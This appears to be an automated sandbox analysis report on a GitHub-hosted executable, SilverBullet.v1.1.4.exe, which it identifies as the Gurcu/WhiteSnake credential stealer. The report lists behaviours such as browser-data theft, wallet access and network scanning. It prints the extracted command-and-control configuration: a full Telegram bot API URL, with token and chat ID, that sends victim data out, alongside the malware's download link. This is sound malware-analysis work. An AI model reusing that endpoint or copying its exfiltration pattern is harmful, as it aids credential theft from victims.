Overview

overview

10

Static

static

1

URLScan

urlscan

https://github.com/o...

windows11-21h2-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    https://github.com/ob2configmaker/SilverBullet/releases/download/v1.1.4/SilverBullet.v1.1.4.exe

  • Sample

    241010-qe4mpasekr

Score
10/10
gurcucredential_accessdefense_evasiondiscoveryexecutionspywarestealer

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7415374304:AAHSK5p8yXRUTkol4R8DEgb269Y0asZr8OQ/sendDocument?chat_id=-1002231908268&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20138.199.29.44%0ACountry:%20United%20Kingdom%0ACity:%20London%0APostal:%20SW1%0AISP:%20Datacamp%20Limited%20-%20A212238%0ATimezone:%20+01:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20Admin%0AOS:%20Microsoft%20Windows%2011%20Pro%0ACPU:%20Intel%20Core%20Processor%20(Broadwell)%0AGPU:%20Scheda%20video%20di%20base%20Microsoft%20(1280,%20720)%0AHWID:%20Unknown%0ACurrent%20Language:%20Italiano%20(Italia)%0AFileLocation:%20C:\Users\Admin\Downloads\dsada\SilverBullet.v1.1.4\bin\disesteemersokulkgn.exe%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20Unknown%0A%0A-%20Log%20Info%20-%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9D%8C%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%206%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0A%0A%0A&parse_mode=HTM

Targets

    • Target

      https://github.com/ob2configmaker/SilverBullet/releases/download/v1.1.4/SilverBullet.v1.1.4.exe

    Score
    10/10
    gurcucredential_accessdefense_evasiondiscoveryexecutionspywarestealer

    • Gurcu, WhiteSnake

      Gurcu is a malware stealer written in C#.

      stealergurcu

    • Creates a large amount of network flows

      This may indicate a network scan to discover remotely running services.

      discovery

    • Contacts a large (938) amount of remote hosts

      This may indicate a network scan to discover remotely running services.

      discovery

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer

    • Unsecured Credentials: Credentials In Files

      Steal credentials from unsecured files.

      credential_accessstealer

    • Accesses cryptocurrency files/wallets, possible credential harvesting

      spyware

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    behavioral1

MITRE ATT&CK Enterprise v15

Tasks